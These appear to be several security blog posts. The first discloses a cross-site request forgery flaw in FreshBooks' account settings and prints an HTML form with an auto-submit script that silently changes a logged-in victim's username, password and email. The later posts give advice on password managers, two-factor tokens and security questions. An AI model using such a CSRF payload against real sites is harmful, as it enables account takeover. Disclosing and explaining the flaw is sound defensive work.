I have run into the this particular issue a lot in the past few weeks. It’s like the new generation of web developers have forgotten about security principles (must be a web 2.0 thing.) For an example of this particular issue, I will use a zero day vulnerability in the popular time tracking / invoicing app FreshBooks. This vulnerability literally took only 5 minutes to identify. It has to make one think about the level of effort these web app companies really put into security, I know it makes me think twice about giving somebody else control of my information.

Now for the fun stuff, I will explain below that a user with a logged in FreshBooks session that visits a malicious website could have their account credentials (username, password) changed in such a manner that they would not know immediately, giving the attacker full control.

It’s all about verifiable trust

Web applications, especially ones that are password protected, rely on the fact that your browser will send the session ID with every browser request. This is a very important design consideration for web app developers designing privileged sections/actions of the application.

For example if a web app developer designs using the mentality “a user has to be logged in (has a valid session) to change their password or do any other privileged activities,” not only is the logged in user able to do those actions but any other page they visit has the ability to have their browser make those requests too. All because of the designed browser behaviour of having your session sent with your request. This is session based trust.

What we need to solve this is transaction based trust. We need the client to prove they are not only allowed from an authentication perspective but are authorized to make this transaction. Now the important part.

For a password change the old password should be provided and verified server side. For other privileged operations other tokens and methods can be used.

Tell me how to exploit FreshBooks already!

As you might have guessed by now FreshBooks does not ask for the old password when setting account information, trusting only on session authentication, bad design flaw. They ask for First Name, Last Name, Email address, username, new password, verify password. They also don’t deploy any other protection mechanisms (which I’m not going to get into here.) So when the FreshBooks user fills out the form and presses save the server takes what the user sent, verified the session was good and saved the info. No other verification is done.

Most of you won’t care, but this is the code that makes up the form in the background (in essence anyway.)

<form name=”csrf” action=”https://xxxxxx.freshbooks.com/menu.php?route=usernameAndPass” method=”post” target=”hidden”>
<input type=”text” name=”fname” value=”Joe”  />
<input type=”text” name=”lname” value=”Schmoe” />
<input type=”text” name=”email” value=”adam@ngenuity-is.com” />
<input type=”text” name=”rate” value=”0.00″ />
<input type=”text” name=”admin_username” value=”USERNAME” />
<input type=’password’ name=”admin_password” value=”PASSHERE” />
<input type=”password” name=”admin_password2″ value=”PASSHERE” />
<input type=”submit” name=”save” />
</form>

This should be pretty straight forward as to what each piece is when compared to the above image. A quick addition of <script>document.csrf.submit();</script> and the browser executes the code for us with no human interaction. Throw all of this (with a few more important details you have to figure out yourself) on a website and you have a nice little, targeted exploit.

All of this could have been avoided if FreshBooks would have simply asked the user for their old password and verified that old password. Sure there are technical controls they can put in place to protect against some of these things, but really this should have been caught during a design assessment of the application.

Special thanks to Adam Brault for helping me test the exploit outside of the lab and agreeing to be pwned.

If you can actually remember all of the places you signed up for accounts over the years and the unique passwords for those accounts you can stop reading this now.

All the rest of you still reading should know that passwords are an important part of keeping prying eyes from your data (and probably have just as hard of a time remembering passwords as I do.) Passwords are very similar to a combination for a safe. Know the right combination and it is easy to obtain the contents. If you don’t happen to know the combination you could try a whole bunch of combination in succession and eventually get the combination. The key word there is eventually. While there are other limiting factors such as frequency of guesses and other controls that I’m going to ignore for the sake of this introduction, passwords for the most part protect against time. The more complex, the more difficult it is to guess, the longer it should supposedly take to obtain the right one.

Make password management easy on yourself and get a password safe application like Password Gorilla. If you are wondering why you need one of these applications here is just a few reasons.

• Remembers your passwords for you (in an encrypted vault!)
• Passwords can be as complex and long as you want them to be.
• You have a convenient list of passwords so that when the New Year comes around you can change them, all of them.
• You can keep information, such as answers to “security questions” in the notes field. You don’t have to use answers like “What is the name of your first pet?  Max”  Instead make them just as complex as your passwords.
• Password Gorilla is cross-platform and works on Windows, OS X and Unix systems. No excuses here!

We all know you aren’t going to go to the gym like you need to, so why not pick a New Year resolution that is attainable, like caring about strong password management, one of the most basic principles in security.

This is a fantastic deal that PayPal and Ebay should be seriously promoting. PayPal and Ebay are both giant phishing targets. They have been offering a 2 factor authentication token for a while now. The cost to you, $5. Includes shipping, no other costs, no hidden fees and it’s easy to use. I highly recommend anybody with a paypal or ebay account get one immediately.

Find out more here:
https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/PPSecurityKey-outside

Side Note:
If you are in the Tri-Cities, WA area and want to learn more about Phishing (and other security topics) come to the DC509, National Cyber Security Month Event being held in October. Aaron Howell from nGenuity will be presenting on Phishing. I will post more information as the event nears.

Entrepreneurs love media attention for themselves and their business. Any chance to get on television or in a publication is quickly jumped upon. The July edition of the Tri-Cities Area Journal of Business features a new section that focuses on young entrepreneurs, asking questions such as “Toughest career obstacle or decision” and “[what are your] lifetime goals?” You might be thinking, “what does this have to do with security? It conveniently relates quite nicely to what I want to talk about; security questions and answers.

Security questions are those questions that you get asked when you want to reset your password, or maybe even to log into a web site. They are typically some simple question that possibly you (hopefully) may only know the answer to.

Some common questions are:

• What city were you born in?
• What is the name of a pet or the name of your first pet?
• Favorite Movie
• Favorite song / book
• … and many other variations.

The problem with security questions is the answers to them are quite often easily found out information. Take the Journal of Business young entrepreneurs section. It offers a wealth of information that might be used.

Answers are typically less complex than a typical password injecting additional weaknesses into the security of your account. Why force a secure password when you don’t force a secure security question? Why are we giving up this information to the sites we log into every day? Because they asked for it, that’s why. We want access to the site and want the ability to reset our password or whatever other functionality the site has tied to the question/answer.

The solution is quite easy. Do not provide the real information. Generate a random answer and document that the same way you would your password. I recommend Password Gorilla, but there are many password archive applications out there to help you manage this.

As an aside, those of you that are being interviewed for publications do your homework first before providing information to somebody that says they are a reporter or journalist. One great social engineering method is to pose as the press to gain information. People love to talk to the press.